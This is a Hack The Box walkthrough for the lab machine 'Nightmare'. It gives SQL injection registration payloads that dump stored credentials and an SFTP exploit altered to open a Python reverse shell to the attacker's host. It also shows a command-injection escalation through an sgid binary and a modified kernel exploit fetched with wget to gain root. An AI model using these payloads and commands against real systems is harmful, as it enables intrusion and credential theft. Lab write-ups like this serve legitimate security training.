Hackthebox - Nightmare

1. Hackthebox
2. HTB
3. Nightmare
4. 10.10.10.66
5.  
6. [1] This machine annoyed me, a lot, and the community is full of elitests (you know who you are) who look down on those who want to learn. This guide is too fight back against that poisonous environment for those who want to learn.
7. [2] I will continue to release these guides whilst that insipid culture exists.
8. [3] "Every society has the criminals it deserves." Emma Goldman
9.  
10.  
11. NMAP -
12. 2 Ports
13. 80 and 2222
14.  
15. Focus on Port 80 for now.
16.  
17. Register a user using burp.
18. http://10.10.10.66/register.php
19.  
20. Intercept the request and modify to to be
21. user=') union select table_schema,table_name from information_Schema.tables#&pass=pass&register=Register
22.  
23. Log in with.
24.  
25. Username = ') union select table_schema,table_name from information_Schema.tables
26. Password = pass
27.  
28. Login with the full username above SQLi is working.
29.  
30. Now to get credentials.
31.  
32. In burp create another user
33. user=') union select username, password from sysadmin.users#&pass=pass&register=Register
34.  
35. Login again.
36.  
37. Note the ftp user credentials.
38.  
39. sftp to the box with the sftp credentials.
40.  
41. Try write or read file to /etc/proc
42. It works!
43.  
44. Getting the SSH version
45.  
46. SSH-2.0-OpenSSH 32bit (not so recent ver)
47.  
48. This is a clue, an old version with a sftp user that can read and write to /etc/proc.
49.  
50. Google the below.
51. sftp misconfig /etc/proc exploit
52.  
53. First URL Full Disclosure: OpenSSH <=6.6 SFTP
54. Use this exploit to get a reverse shell on port 80
55.  
56. Change the line "char shell_commands[] =" to be
57.  
58. char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.x.x\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subproces
59. s.call([\"/bin/sh\",\"-i\"]);'&";
60.  
61. Compile and execute with a netcat listener on port 80.
62.  
63. Initial enumeration is that there is no writeable folders and things are "limited"
64.  
65. There is a cron job running every 15 minutes
66. cat /etc/cron*
67. */15 * * * * decoder /home/decoder/test/script.sh
68.  
69. Looking for the obvious the user in /home is decoder so look for files or directories owned by that user/group id.
70.  
71. find / -type f -group decoder 2>/dev/null
72.  
73. /usr/bin/sls is found.
74.  
75. Investigating this binary
76.  
77. ls -lah /usr/bin/sls
78. -rwxr-sr-x 1 root decoder 8.9K Feb 18 2016 /usr/bin/sls
79.  
80. Decoder is the owner and the file has the sgid bit set. Running strings against the file, it runs /bin/ls even more investigating shows there is a filter of escape characters.
81.  
82. looking at the man page of ls the escape switch is -b
83.  
84. Try.
85.  
86. /usr/bin/sls -b $'\n /bin/bash -ip'
87. id
88. uid=1002(ftpuser) gid=1002(ftpuser) egid=1001(decoder) groups=1001(decoder),1002(ftpuser)
89.  
90. Now read user.txt
91.  
92. cat /home/decoder/user.txt
93.  
94. Coming back to the cron job we can write files as decoder to the test folder.
95.  
96. ls -lah /home/decoder
97. drwx-wx--x 2 root decoder 4.0K Feb 25 15:22 test
98.  
99. Looking for kernel exploits.
100.  
101.  
102. Google to the rescue
103. google -> linux 4.8.0-58-generic exploit
104. Exploit is found
105. https://www.exploit-db.com/exploits/43418/
106.  
107. Download to the local machine.
108.  
109. Analysing the exploit it is noted that running the exploit will cause an error as the user cannot get the version info and the release has been changed.
110.  
111. For example.
112. Line 451 reads the release.
113. /etc/lsb-release
114.  
115. if the file is examined.
116. cat /etc/lsb-release
117. DISTRIB_ID=s390x
118. DISTRIB_RELEASE=0.1
119. DISTRIB_CODENAME=bladerunner
120. DISTRIB_DESCRIPTION="s390x GNU/Linux"
121.  
122. This wont match any items in the array in the beginning of the file.
123.  
124. A hacky way to fix this is to reduce the array to only have the exploit we want.
125.  
126. Change
127. int kernel = -1;
128.  
129. to be
130.  
131. int kernel = 0;
132.  
133.  
134. Delete all array items but the below as this matches uname -a
135.  
136. { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
137.  
138. Now force the exploit to accept this version by commenting out lines 504 and 505
139.  
140. printf("[-] kernel version not recognized\n");
141. exit(EXIT_FAILURE);
142.  
143. compile the exploit and upload to the server.
144.  
145. gcc 43418 -o 43418
146. wget http://10.10.x.x/43418 -O /home/decoder/test/43418
147. chmod +x /home/decoder/test/exploit
148.  
149. Running as the ftpuser with the decoder egid set gives an error
150. /home/decoder/test/43418
151. [.] starting
152. [.] checking distro and kernel versions
153. [~] done, versions looks good
154. [.] checking SMEP and SMAP
155. [~] done, looks good
156. [.] setting up namespace sandbox
157. [-] write_file(/proc/self/set_groups): Permission denied
158.  
159. Exit the egid shell back to the ftpuser shell and run the exploit again.
160.  
161. /home/decoder/test/43418
162. [.] starting
163. [.] checking distro and kernel versions
164. [~] done, versions looks good
165. [.] checking SMEP and SMAP
166. [~] done, looks good
167. [.] setting up namespace sandbox
168. [~] done, namespace sandbox set up
169. [.] KASLR bypass enabled, getting kernel addr
170. [~] done, kernel text: ffffffff98e00000
171. [.] commit_creds: ffffffff98ea5d20
172. [.] prepare_kernel_cred: ffffffff98ea6110
173. [.] SMEP bypass enabled, mmapping fake stack
174. [~] done, fake stack mmapped
175. [.] executing payload ffffffff98e17c55
176. [~] done, should be root now
177. [.] checking if we got root
178. [+] got r00t ^_^
179. root@nightmare:/#
180.  
181. Thats all folkes.